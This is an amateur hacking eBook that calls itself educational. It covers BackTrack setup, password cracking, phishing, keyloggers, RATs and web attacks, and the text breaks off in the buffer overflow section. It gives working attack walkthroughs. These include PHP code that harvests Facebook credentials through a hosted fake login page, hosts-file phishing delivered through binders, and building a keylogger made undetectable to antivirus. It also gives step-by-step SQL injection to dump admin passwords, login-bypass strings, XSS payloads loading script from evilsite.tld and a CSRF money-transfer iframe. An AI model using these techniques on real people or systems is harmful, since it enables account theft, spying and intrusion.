root@localhost:~#
root@localhost:~# “what they keep secret we expose” By Ubaid (aka) $cr1pt Kid33
1
Copyright Notice Any unauthorized use, distributing, reproducing is strictly prohibited. Without the permission of its author. Liability Disclaimer The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defence attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” in this eBook should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.
2
Contents Contents..............................................................3 Introduction.........................................................6 What is ethical hacking...........................................................6 Who is a hacker.....................................................................6 Types of hackers ....................................................................6 Who can use this book............................................................7 NETWORKING.......................................................................... 7 a)Concept of networking.................................................................................7 b)Basics about TCP & UDP...............................................................................8
Programming.......................................................9 Do I really need it?..................................................................9 Where should I start?..............................................................9
Backtrack...........................................................10 What is it?............................................................................. 11 2.Installing & Running Backtrack .........................................12 1)Clean Hard drive install..............................................................................12 2)Dualboot Installation..................................................................................17 3)USB installation.......................................................................................... 18
Basic Linux Commands.........................................................19
Password Hacking..............................................20 3
Password Cracking................................................................20 1)Brute Force................................................................................................ 20 2) Dictionary Based attack............................................................................21 3)Rainbow tables........................................................................................... 21 Rainbow tables are a large database of pre computed ciphers with their actual plaintext from which they were calculated. Rainbow table generator are the tools which takes all possible combination of legal characters & calculate their hash using your desired algorithm & store them in a large database. Common Cryptographic algorithm used in CMS’s are...................21
Phishing................................................................................24 1)Demo (How crackers hack your facebook account using phishing)............24
Desktop phishing..................................................................28 Social Engineering...............................................................29 Keylogging............................................................................30 Demo: How to hack using Ardamax Keylogger..............................................31
RAT (Remote Access Trojen).................................................34 Malware................................................................................35
Web Hacking......................................................35 Footprinting..........................................................................35 Port Scanning........................................................................ 39 SqlInjection...........................................................................41 Authentication Bypass..........................................................50 XSS.......................................................................................51 CSRF.....................................................................................53 Buffer Overflow.....................................................................54 RFI........................................................................................ 57
4
LFI......................................................................................... 58 Open Redirection.................................................................61
About.................................................................62
5
Introduction What is ethical hacking Ethical Hacking is the process of finding vulnerabilities in a computer system by using programming or non programming skills (just like rooting an apple device without any software) & then exploiting these vulnerabilities.
Who is a hacker A hacker is someone who uses his computer knowledge to find vulnerabilities in computer systems & then exploit it for any reason including Patriotism, malicious purpose, or some personal problems with the owner of that system.
Types of hackers There are basically three types of hackers:1-: Grey Hat They are the combination of both Black Hat & White Hat hackers. They Sometime work as defensive & sometime offensive. 2:-White Hat Their sole purpose is to test websites individualy or for a company & report them about their vulnerabilities. 3:-Black Hat They break system security for malicious purposes including identity theft, credit card theft, destruction of data etc,. Other Than these there are also some other types:1. Elite Hackers They are highly skilled hackers they are good programmers as well. They create new exploits & also help in cyber security awareness. 6
2. Script Kiddies They are non-expert they usually hack using programmes created by others but they are a rank higher than Neophyte. 3. Neophyte These are the newbies or n00bs who don’t know anything about hacking & other techniques. 4. Blue Hat A person outside some security company or a firm who test security or bug vulnerabilities of their apps. 5. Hacktivists A hacktivist is a hacker who breaks into a system to announce a social, political or religious message.
Who can use this book Anybody who is interested in cyber security including Students, administrators, webmasters, analysts, engineers blah blah in fact everybody who is connected to internet can use its content to get some awareness about latest cyber attacks.
NETWORKING a) Concept of networking
Networking is the process of connecting two or more computers in order to communicate & share resources such as printers,data etc. a)LAN A Local Area Network (LAN) is a network that is confined to a relatively small area. It is generally
7
limited to a geographic area such as a writing lab, school, or building. b)WAN Wide Area Networks (WANs) connect networks in larger geographic areas, such as Kashmir, the Palestine, or the world. Dedicated transoceanic cabling or satellite uplinks may be used to connect this type of global network. c)MAN A Wide Area Network or WAN is a type of networking where a number of resources are installed across a large area such as multinational business. Through WAN offices in different countries can be interconnected. The best example of a WAN could be the Internet that is the largest network in the world. In WAN computer systems on different sites can be linked d)Peer to Peer(P2P) A peer-to-peer (abbreviated to P2P) computer network is one in which each computer in the network can act as a client or server for the other computers in the network, allowing shared access to various resources such as files, peripherals, and sensors without the need for a central server. b) Basics about TCP & UDP Transmission Control Protocol It is a connection oriented protocol Message delivery is guaranteed Data arrives in order Packets are sent as Stream There is retransmission of packets It is Slow because of extensive error checking which make it slow E.g. include HTTP, SMTP, FTP, SSH
8
User Datagram Protocol It is a connection less protocol Message delivery isn’t guaranteed There is no order in data arriving Packets are sent individually There is no retransmission of packets It allows only basic error checking making it faster than TCP but less robust E.g. include DNS, VOIP,SNMP,BOOTP
Programming Do I really need it? To Become a good hacker you should possess a good programming skills. Its the only way you will create your own exploits & tools which will help you a lot in your way to become a good hacker. “Eat, Drink & code, Or your system will overload” – Microsoft*(Hack Marathon)
Where should I start? The most important question every newbie asks, the easiest way is to start reading books, clear the basics then go into advance & the important thing take references from the programmers. Type Compiled
Description Those which are processed by a compiler
Multiparadigm
They allow a program to use more than one programming style
E.g C,C+ +,C#,VisualBasic,Vis ual Fox Pro etc PHP,Python,Perl etc
1) Always take languages which are easy to understand. 2) Try to make your own programs as soon as possible. 9
3) Look at your code & try to understand every example, how & what do these codes do, why we need them & blah blah 4) Learn how to use a debugger. 5) If you are not able to understand clear your ideas from various online forums like Stack overflow. 6) All languages are almost same the only difference is that the syntax changes, that’s why take only that language which you think you can understand, so that it will be easy for you to understand other languages too. 7) Keep Coding, Coding & Coding
Backtrack
10
What is it? BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use.The current version is BackTrack 5 R3. It consists many tools. BackTrack arranges tools into 12 categories:
Information gathering Vulnerability assessment
Exploitation tools
Privilege escalation
Maintaining access
Reverse engineering
RFID tools
Stress testing
Forensics
Reporting tools
Services
Miscellaneous
Some of the well known security tools which it includes are: Metasploit for integration RFMON, injection capable wireless drivers Aircrack-ng Kismet Nmap Ophcrack Ettercap Wireshark (formerly known as Ethereal)
Download it here
11
2.Installing & Running Backtrack There are 4 ways by which you can install backtrack, depending on you i.Clean Hard drive install: whole drive is used for backtrack ii.Dual Boot Installation:Your system already have a windows o/s which is taking up all the space in your hard drive, now you are resizing or partitioning your drive to install dual o/s i.e window + Backtrack iii.USB installation: Installing backtrack either clean hard drive or dual boot with a USB drive instead of a DVD
1) Clean Hard drive install
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
12
13
14
Select your geographical location and click “forward”. Same for the Keyboard layout
15
The next screen allows you to configure the partitioning
layout. The assumption is that we are deleting the whole drive and installing BackTrack on it. Accept the installation summary and client “Install”. Allow the installation to run & complete.
16
Restart when done Log into BackTrack with the default username and password root / toor. Change root password. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot.
2) Dualboot Installation
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface. Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console. Select your geographical location and click “forward”. Same for the Keyboard layout. The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the Windows 7 partition and installing BackTrack on the newly made space. Grub should allow you to boot both into BackTrack and Windows. 17
Log into BackTrack with the default username and password root / toor. Change root password. Fix the framebuffer splash by typing “fix-splash” ( or “fix-splash800″ if you wish a 800×600 framebuffer), reboot. Accept the installation summary and client “Install”. Allow the installation to run and complete. Restart when done. 3) USB installation
Plug in your USB Drive (Minimum USB Drive capacity 2 GB) Format the USB drive to FAT32 Download Unetbootin from http://unetbootin.sourceforge.net/ Start Unetbootin and select diskimage (use your backtrack ISO)
18
Select your USB drive and click “OK” for creating a bootable BackTrack USB drive Log into BackTrack with the default username and password root / toor.
Basic Linux Commands Startx:To start GUI in backtrack Halt:Shudown Sleep:sleep Reboot:Restart Cd:change directory Ls –la: Listing directory Mv $folder $newfolder:Change the name of a directory Pwd: Print working directory Find / love: Find file named love in rot directory Rm –r:Remove an existing directory Cp:copy files Killall program:Kill all Processes Ps aux:show running process Ifconfig:Ipconfig Gcc in_file –o out_file: For compiling c files Sudo:To give super user rights Ping host:Sends an echo request via TCP/Ip to a specified host Id:To which user you are logged in cat /etc/passwd:To show account list uname –r:Show released info uname –a:Show kernel version dpkg -l:To get list of all the installed programs last -30: Show’s log’s of last 30 ip’s useradd: To add user account usermod: To modify useraccount w:show logged users locate password.txt:Show location of password.txt in current directory rm –rf/: To remove all chmod ### $folder: change permission of a folder lsmod:Dump kernel modules dmesg:To check Hardware info
19
For the beginners there are a lot of websites which teach linux for free check it out this on http://www.beginlinux.org/ or just google it
Password Hacking The Process of stealing password or credentials from the legitimate user is called password hacking. There are many ways by which we can get the password of device, email, router, account blah blah.
Password Cracking The process by which we get a password by giving a range of characters or predefined words is called password cracking. Password can be cracked by the following ways:a) Brute force Attack b) Dictionary Based attack c) Rainbow tables
1) Brute Force
Brute Force is a technique used by a application program to decode any encrypted data (encoded using an algorithm). What a Brute Force program actually do is, it take all possible combination of legal characters i.e. Alphabets (both uppercase & lowercase), Numbers, & Symbols & proceeds with them. If the password length is 4 & contains only alphabets in lowercase & no special character or number therefore it will starts brute force like this “a”,“aa”,“aaa”,“aaaa”,”aaab”,aaac” blah blah. These programs can attempt many strings per minute. For a strong encrypted data (consisting Alphabets both uppercase & lowercase, Numbers, & Special Characters 20
i.e. Symbols) can take many days to get decrypted. These programs can overcome any encrypted data (password/hash). Some of the Commonly Used Programs Are Cain & Abel, Brutus, John The Ripper etc. Backtrack contains many brute force tools.
2) Dictionary Based attack
In this technique a program uses an English Dictionary to decrypt an encrypted cipher. In this type a program uses all possible legal words contained in a dictionary to decrypt a password/hash known as cipher. Cain & Abel, Brutus, John The Ripper are some of the tools used to launch a dictionary based attack. 3) Rainbow tables
Rainbow tables are a large database of pre computed ciphers with their actual plaintext from which they were calculated. Rainbow table generator are the tools which takes all possible combination of legal characters & calculate their hash using your desired algorithm & store them in a large database. Common Cryptographic algorithm used in CMS’s are
21
22
Cryptographic Length Hash MD5 128 bits MD5 Salted
128 bits : Any Length
SHA1
160 bits
SHA256
256 bits
MySql 5
164 bits
MD5 (wordpress)
136 bits
Note 32 char Hexadecimal Contains two blocks 32 char Hex:Random 40 char Hexadecimal 64 Char Hexadecimal 41 char All Char Capital Starts with Asterik * 34 Char Starts with $P$ Variable case alpha numeric
MD5 (phpBB3)
136 bits
23
34 Char Starts with $H$ Variable case alpha numeric
Phishing The most common way to acquire personal information such as username, password, email id, credit card info, etc. If you too lazy to inspect some basic info just like seeing your url while clicking on any link, then you will soon lose access to your account’s. Here is a demo how to hack into any account using phishing. 1) Demo (How crackers hack your facebook account using phishing)
1. Go to facebook.com 2. Right click anywhere on the page & click on view page source
3. Copy all source code into notepad or any editor. 4. Inspect the source code & find “action=” as shown in fig.
24
Change “action=https://www.facebook.com/login.php? login_attempt=1” to “action=next.php” & method=”post” to method=”get” & save whole page to anything say hello.php 5. Now open a new page in notepad & write the following code into it
header("Location: https://login.facebook.com/login.php"); $handle = fopen("passes.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
& save as next.php in the same directory I will not go into deep what these pieces of lines
do. 6. Now again open a new page in Notepad & save as passes.txt (Keep the page blank) 7. Create a hosting account at any free hosting website say bytehost & get your domain say XXXXXX.bytehost.com. 8. Now open your dashboard & click on filemanager.
25
Under file manager click on public_html
9. Upload all three files to the public_html folder. 10. Now your Urls will be like this XXXXXX.bytehost.com/index.php XXXXXX.bytehost.com/next.php XXXXXX.bytehost.com/passes.txt 11. Give your url XXXXXX.bytehost.com/index.php to your victim & try to convince him to login with his credentials. (I am kidding dnt try to pwn any one, it’s only for educational purpose)
In image I logged in with username=aa & password=aa 12. When anybody login to that website with his email id & password, the credentials will be saved at 26
XXXXXX.bytehost.com/passes.txt & he will be redirected to real facebook login page.
Whoo you have got the credentials of your victim. This tutorial is only for educational purpose, & will make you aware about how hackers hack into your profiles by phishing.
How to Prevent yourself from being a victim of phishing The best way to prevent phishing is that you Always double check (if your eye site is weak :P lol) the url of facebook website & always use secure connection “https://” instead of “http://” i.e https://www.facebook.com. Hackers always use domain names similar to facebook like facebok,facebuk,face-bok blah blah
27
Desktop phishing Host file is a system file used by the operating system to map hostname to their ip addresses. It is %windir %\System32\drivers\etc. Things you need 1. Static ip or you can use a vpn which assign you a static ip like Strong Open VPN Download It Here 2. A webserver wamp or xampp 3. Facebook phisher (Already built in simple phishing above this tutorial) 4. Desktop phishing script 5. & Binder google them. Install Wamp & VPN Now copy phishing files i.e (hello.html, next.php, & passes.txt) to the root directory of your webserver for wamp it is %installation directory/wamp/www
Now open Notepad & enter this Desktop phishing script
Replace 0.1.2.3 in Desktop phishing script with the ip address you got from the vpn, to check ip address goto http://cmyip.com & save file as anything.bat This file could look like suspicious to the persom you are sending through email or by data transfer medium. So we will bind it with another file using binder’s Google them you will find loads of binders out there. 28
After the victim executes your .bat file his host file adds some thing like this
& whenever he enter www.facebook .com he will be redirected to you ip address hosting phisher.
Social Engineering Its one of the biggest threat to our privacy. It’s an act by which an attacker manipulates with the mind of people so that they can give their confidential information to the attacker. They usually trick people by reading their body language. Biggest scam’s like fake lottery, money transfer etc are the result of social engineering. It plays a vital role in any type of phishing. It is the biggest threat to the companies. They (attacker) usually trick employees of the company resulting in the theft of financial information/confidential information. An attacker usually call or email people tell them he is from the customer care/support & ask them some personal question’s like their Name, D.O.B, Residence, email id, Password & usually most of the people give their personal information including their 29
password thinking that they are getting that call/email from a legitimate source. After collecting some information they get access to your secret information/accounts. And Bang! Victim gets Social Engineered.
Keylogging Keylogging is the method of tracking the keys struck on keyboard. It can be done by two ways either using Software Keylogger or Hardware Keylogger. Both these keylogger’s store the keys struck on the keyboard in the memory in the form of logs. Later these logs can be send to the email id, or the ftp of the attack. Software Keylogger: They usually consist of two files i.e. “.dll” & “.exe” file. The .exe file executes the dll file & makes the keylogger work. They are binded & encrypted, making an anti-virus hard to find any evidence. They usually work in stealth mode making victim even more hard to find them. They have many features like:1. They work in stealth mode. 2. They capture screenshots. 3. They consist remotely deploy wizard. 4. Registry entries are hidden. 5. Website visited tracks. 6. Application used tracks. 7. Capture HTTP Post operation. 8. Capture video of victim using webcam. 9. Record sound of surrounding using a microphone connected. 10. They can be exported using txt or html. 11. User friendly interface. 12. Can track your location. 13. Automatic delivery of logs after interval set by attacker. 14. Capture chat logs. 15. Password authentication.
30
Demo: How to hack using Ardamax Keylogger.
1. Buy ardamax Keylogger from their site or just Google it if you don’t want to spend money. You will get a pro version
with remote deployment wizard.Install the setup. Now register your keylogger.
31
2. After registering click on remote Installation
3. Click Next until you Security dialog, Click on enable & set password. After that click on Next. Now you will get Options dialog here set your magic keys.Click next. Now Comes the first part of Control section Select the method & time interval through which you want to receive the logs as shown in image “4”.Click next. Now comes the heart of this tutorial if you make some mistakes here your keylogger will not work enter the details as shown in image “5”. Click next. After clicking next you will get another Control dialog as shown in image “6”.Keep your desired settings here. & click next. Note: Keep you Anti Virus Disabled
32
4.
Keep clicking next until you get destination dialog Select your path, change icon & click next until the wizard gets completed & you will get a success build message.
33
5. After building you need to crypt it so that it will not get detected by anti virus. Download any good FUD(Fully UnDetectable) Crypter(google it), which will crypt your keylogger & Now can bypass anti virus. Note: This file will get detected by most of the anti virus, so keep your anti virus disabled until you make your keylogger. 6. Now share your keylogger through your Social engineering talent :P :D
RAT (Remote Access Trojen) Its is a type of trojen which is used to control over the victims machine. Once installed it can do whatever an attacker wish, can create files, folders, open cd-drive, play popup, use you files, upload & download files on you machine. After installing on your machine an attacker can do all these things remotely:1. Create, Open & delete Files & Folders. 2. Format complete hard disk 3. Install malicious programs. 4. Overload your memory RAM or ROM 5. Can use your system for malicious purposes like DDOS 6. Hide files, & folders 7. Control your peripherals & start or kill your processes. 8. Record music & video 9. Steal passwords 10. Print rich contents & view your screen. Some of the commonly used RAT are Cybergate, Darkcomet,LAN filtrator, Spy-Net.
34
Malware Malware is a piece of script which is used to destroy/disable computers, gather sensitive data, gain access to private networks, create backdoors or to interrupt a private computer network. They include worm, Trojans, adwares, spywares, rootkits & viruses. In short when we combine all type of computer threats then they are known as Malware. It is usually used to spy on foreign networks, government organizations, or corporate sectors. It can be either a piece of script, software or active contents. They usually copy itself from one network to another using removable disks. They are distributed through social networking sites, file sharing websites, or infected websites. Once the file is installed on your device it then connect to internet & download other modules of it.
Web Hacking Website hacking is the process of penetrating into a web application by exploiting a vulnerability in it. Below are some of the techniques used by attackers
Footprinting This is the first step of ethical hacking. Before a pen tester goes into deep, the most important thing is to gather some information about the machine. It includes checking open ports, whois, nslookup etc a) Open Ports:- Firstly we need to know what are Networking Ports? A port is a specific software either application or process, acting as a end point of a computer’s host operating system. E.g. Port 80=HTTP, 21=FTP, 443=SSL . To find the Open Port in A End User system we have many tools available, Most widely tool is Nmap which help us to detect ports on a remote system. Also there are many online websites which help you find the open ports on a
35
remote system like yougetsignal, canyouseeme, t1shopper etc b) Banner Grabbing: After finding the open ports now comes the Banner Grabbing. It is the technique by which a attacker can get some really important information about the services running on the remote system like operating system, service application version, developer etc. You Can get information using telnet simply. Open command
prompt & enter as shown in image. Replace google.com with your website
After enter these information you will get some information like this
36
After getting the banner information an attacker finds the exploit for the services running on that remote host. Commonly used exploit database’s are exploit-db, 1337day, metasploit, security vulns c) Other than these methods an attacker can use various other techniques to dig up information from the various online sources like whois, it is the method by which an attacker can get information about the domain name registering organization or individual like his name, address, email etc. Commonly used websites for finding who is are whois.net, whois.com, who.is, network solutions d) Nslookup: It is the technique to get information about name servers of a domain & map dns records. It comes pre installed with windows o/s. To get information about a domain follow these steps: Open command prompt & enter “nslookup anyurl.com”
37
Or you can use online services to find nslookup like Network-tools e) Tracert: It is another important tool, it allows an attacker to find the route & delay time to the remote host. Using simple command “tracert
yoururl.ext” e.g., tracert yahoo.com
38
Port Scanning Port scanning is one of the important aspect of ethical hacking. We can scan ports both with/without using a software. One of the best tool used for scan ports is Nmap. For windows Download GUI of Nmap called Zenmap from their official website For linux users, open terminal & type “sudo apt-get install nmap” (without quotes) It comes preloaded with backtrack linux. For windows:After Installing open zenmap.exe GUI of nmap will open in front of you Enter the url in the url field & choose your profile depending upon your needs.
39
Since these tools left a bunch of traces including your Ip address it can sometimes create a problem for the person scanning a remote host. Therefore it is better to use an alternative, & mostly people prefer to do all the things using website without installing such software’s on their machine. Here i have got an alternative ScanPlanner it is a website which detect many useful thing on a remote host including ports, O/S, Remote Services/Versions. Goto ScanPlanner, Enter your url in the input box & select the appropriate check boxes. & click in Run Scan
40
Besides scanplanner there is another site known as yougetsignal which allows us to find many useful information about a website including ports, reverse ip, network location etc
SqlInjection Before Sql Injection we have to know about Sql. Sql or Structured Query Language as the name implies is a programming language responsible for the updating, deleting & requesting information from the database management systems. Sql injection is a flaw in a application which exploits a bug that can allow attacker to get sensitive information from the database. It is one of the deadliest hacking technique by attackers which is caused by the vulnerability when the user input is not filtered properly, the user input is allowed to execute as a sql statement in the database of the application. The attacker inserts a sql command (query) into the entry form or any input field which gets executed in the database application enabling attacker to manipulate database. A successful sql injection can enable attacker to read the data from database or write data into the database. Key Concept of SQL injection
41
• User input is directly sent to database interpreter as a sql query without filtering the input. • Attacker tricks interpreter by using various special sql queries. • By using sql queries an attacker can do whatever an attacker wants to do e.g delete, read, write, update data etc • With the sql injection vulnerability an attacker can deface the website. • Upload malicious files thus can get access to whole server & can execute remote codes on host operating system. Demo:String SQLQuery ="SELECT Username, Password From users where username='" + txtUsername.text + "' AND Password='" + txtPassword.text + "'"; If an attackers inserts ' or '1'='1 as username & password the query will become as
String SQLQuery ="SELECT Username, Password From users where username=' or '1'='1 AND Password=' or '1'='1 “'"; As we know one is always equal to one, thus it will login an attacker as a user, and return data from the database allowing an unauthorised user to view sensitive data. Later an attacker can edit, update, or delete from the database.
Testing SQL injection vulnerability
42
The easiest way is to use an single quote (‘) after the variable of an parameter.
http://vulnerablesite.tld/index.php? id=test’ If you get some error like “ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line “” , or if you notice something went missing from page like picture, text etc or the webpage is taking a long time to open after adding the single quote. Then that website is vulnerable. Or sometimes you will get more generic response from server like HTTP Server status Code 500, that means sql statement is invalid.
Manual Sql Injection Demo (From Xedlgubaid.blogspot.com) 1). Check for vulnerability Let's say that we have some site like this http://www.site.com/news.php?id=5 Now to test if it is vulnerable add quote ' (quote), and that would be http://www.site.com/news.php?id=5' some error like
so if we get
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar as discussed above in Testing Sql injection vulnerability 2). Find the number of columns To find number of columns we use statement ORDER BY . We will keep incrementing the number 43
until we get an error. http://www.site.com/news.php?id=5 order by 1/* <-no error http://www.site.com/news.php?id=5 order by 2/* <-no error http://www.site.com/news.php?id=5 order by 3/* <-no error http://www.site.com/news.php?id=5 order by 4/* <-error (we get message like this Unknown column '4' in 'order clause' or something like that) that means that the it has 3 columns, cause we got an error on 4.
3). Check for UNION function With union we can select more data in one sql statement. so we have http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). ) if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works 4). Check for MySQL version http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try -it's a comment and it's important for our query to work properly. let say that we have number 2 on the screen, now to check for version 44
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar. It should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/* if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then we have to use convert() function http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/* Or with hex() and unhex() http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/* and you will get MySQL version 5). Getting table and column name Well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.we must guess table and column name in most cases.common table names are: user/s, admin/s, member/s ...common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc... i.e would be http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good ) we know that table admin exists... now to check column names. 45
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name) we get username displayed on screen, example would be admin, or superadmin etc... now to check if column password exists http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name) we seen password on the screen in hash or plaintext, it depends of how the database is set up i.e md5 hash, mysql hash, sha1... now we must complete query to look nice for that we can use concat() function (it joins strings) i.e http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/* Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon) (there is another way for that, char(58), ascii value for : ) http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/* Now the username password will be displayed on 46
screen, i.e admin:admin or admin:encrypted hash when you have username & password, you can login like admin or some superuser.
6). MySQL 5 Like i said before i'm gonna explain how to get table and column names in MySQL > 5. For this we need information_schema. It holds all tables and columns in database. to get tables we use table_name and information_schema.tables. i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/* here we replace the our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of query to list out all tables. i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/* note that i put 0,1 (get 1 result starting from the 0th) now to view the second table, we change limit 0,1 47
to limit 1,1 i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/* the second table is displayed. for third table we put limit 2,1 i.e http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/* keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... To get the column names the method is the same. here we use column_name and information_schema.columns the method is same as above so example would be http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/* the first column is diplayed. the second one (we change limit 0,1 to limit 1,1) ie. http://www.site.com/news.php?id=5 union all select 48
1,column_name,3 from information_schema.columns limit 1,1/* the second column is displayed, so keep incrementing until you get something like username,user,login, password, pass, passwd etc... if you wanna display column names for specific table use this query. (where clause) let's say that we found table users. i.e http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/* now we get displayed column name in table users. Just using LIMIT we can list all columns in table users. Note that this won't work if the magic quotes is ON. let's say that we found colums user, pass and email. now to complete query to put them all together for that we use concat() , i decribe it earlier. i.e http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* what we get here is userass:email from table users. example: admin:hash:[email protected]
49
After getting all the credentials you can login to Admin Panel, commonly Admin Panels are located at /login.ext (where ext will be the platform on which website is made like php,asp etc) /admin.ext /adminlogin.ext Or you can use google dorks or find it online using online admin panel scanner like
http://scan.subhashdasyam.com/admin-panel-finder.php
Authentication Bypass As the name implies it is a flaw in badly coded webapps which allow direct access to backend of a webapp without any use of valid credential. By inputting some malicious strings we can get access to the backend. Here are some special strings, ’or’’=’ ‘or’’1=1-admin'-admin' or '1'='1-admin' or '1'='1'-admin'or 1=1 or ''=' admin' or 1=1-admin') or ('1'='1-admin') or '1'='1-Lets take a form which takes username & password
SELECT * FROM Users WHERE Username=’$User’ AND Password='$Pass’
Let user= '1'='1’-& pass= '1'='1’--
The query will become
50
SELECT * FROM Users WHERE User='1'='1’-- AND Pass='1'='1’--
Since we know 1 is always equal to 1 it will get executed & authenticate the user without knowing for the actual username & password. -- means comment it tells the database that not to execute the remainder. Thus anything after the -- will be neglected & will not be executed.
XSS XSS or Cross site scripting is one of the biggest security flaw in web application which allow an attacker to steal cookies, redirect to malicious pages etc. This vulnerability has affected all type of websites from Google to Facebook. It is a type of vulnerability which allows an attacker to inject malicious codes into the web apps. While talking of xss we think of JavaScript, but it’s not only JavaScript’s it can be any HTML, XML as well as JavaScript. It is caused by poor coding, when a developers don’t filter special symbols like “>””,””/” an attacker can take advantage of it. Malicious Strings can be inserted to the page through tampering URL, Search field, input fields, comment boxes etc. A common XSS script looks like this; <script>alert(“root@localhost:~#”) It will pop up a box like this
51
Xss is of three types a) Persistent b)Non-Persistent based
c)Dom
a) Persistent: As the name indicates it is a kind of xss which works for temporary time, it is commonly executed through HTTP query or form submission. It is also called reflected xss. A persistent xss could look like this http://vulnerablesite.tld/index.php? parameter=<script>alert(“XSS”)
b) Non-Persistent: It is kind of xss in which the malicious script is Stored in the webapp permanently so whenever a user try to view the page script gets executed. Common e.g. will be a comment box, when an attacker inserts some malicious script into the comment field it will get saved into the webapp permanently. If that comment box doesn’t sanitize requests the scripts will gets executed every time a user visits that page containing that comment box. It is also Called Stored XSS. A Non-Persistent xss could look like this <script src=http://evilsite.tld/maliciouspage.js> c) Dom based: It is also called type-0 xss, it is occurred by modifying DOM environment of a browser. Client side is responsible for this attack while as in reflected & stored server side code is responsible. Server side request doesn’t change while as code for the client side run in a different manner. Many sites are vulnerable but doesn’t execute code because developers filter special symbols, but these filters can be bypassed by encoding them using various techniques like Hex, Char Code, ASCII etc. 52
After encoding the malicious code look like this Source String: <script>alert("XSS")
URL: %3C%73%63%72%69%70%74%3E%61%6C %65%72%74%28%22%58%53%53%22%29%3C%2F %73%63%72%69%70%74%3E
HTML Value (with semicolons): <script>& #x61;lert("X x53;S")
HTML Value (without semicolons): <script>a
8ert("XSS") </script>
Base64: PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= Demo Xss Using a xml file: <script xmlns="http://www.w3.org/2000/svg">
Impact of XSS: Remotely Control Browser. Spread Worms, Malware etc. Redirect to malicious pages. Steal Cookies thus can Hijack accounts Can Exploit browser.
CSRF
53
CSRF or Cross Site Request Forgery is one of the dangerous vulnerability in webapps. In CSRF a victim is forced to execute some HTTP request in order to do some actions. The only need is that victim must be logged in at that time & a little bit Social Engineering. It is very easy to exploit a csrf vulnerability & can have a very critical impact. It is commonly executed using image tag or an iframe. Demo of CSRf <iframe src="http://anonymousbank.com/transfer? account=John&amount=9999999999&recipient=Ahmad">
As you can see above when these piece of code’s are embedded in a webpage & John is forced to open that page, it will transfer 9999999999 from the account of John to Ahmad.
Buffer Overflow Here comes the real part Buffer overflow is the vulnerability when a program tries to write more data in buffer memory than it is capable of thus making it to write in adjacent memories thus over writing the data stored in those adjacent memories. The extra data can contain some malicious code which can trigger some malicious action. By buffer overflow an attacker can get partial or full control over victim’s machine. Later he can add some backdoors on the victim’s machine for further action & can use victim’s system as a bot. It is one of the deadliest attack. Exploitation vary from heap based memory & stack. 54
Buffer overflow demo Thanks to Passwdatt /* This program is a good example of buffer overflow attack that corrupts data (password) without modifying the address of the variable that stores it. The program accepts user name as input and loads the stored encrypted password into a buffer. When the user enters a password that is longer than 8 characters, it overwrittes the system password. Thus creating a window of opportunity for a hacker to break into the system. The valid usernames and passwords can be found in the init_list function. The program uses Caeser Cipher where the shift is 3. For example a,b,c will be d,e,f.. so on and x,y,z will be a,b,c. */ #include #include #include #include #include
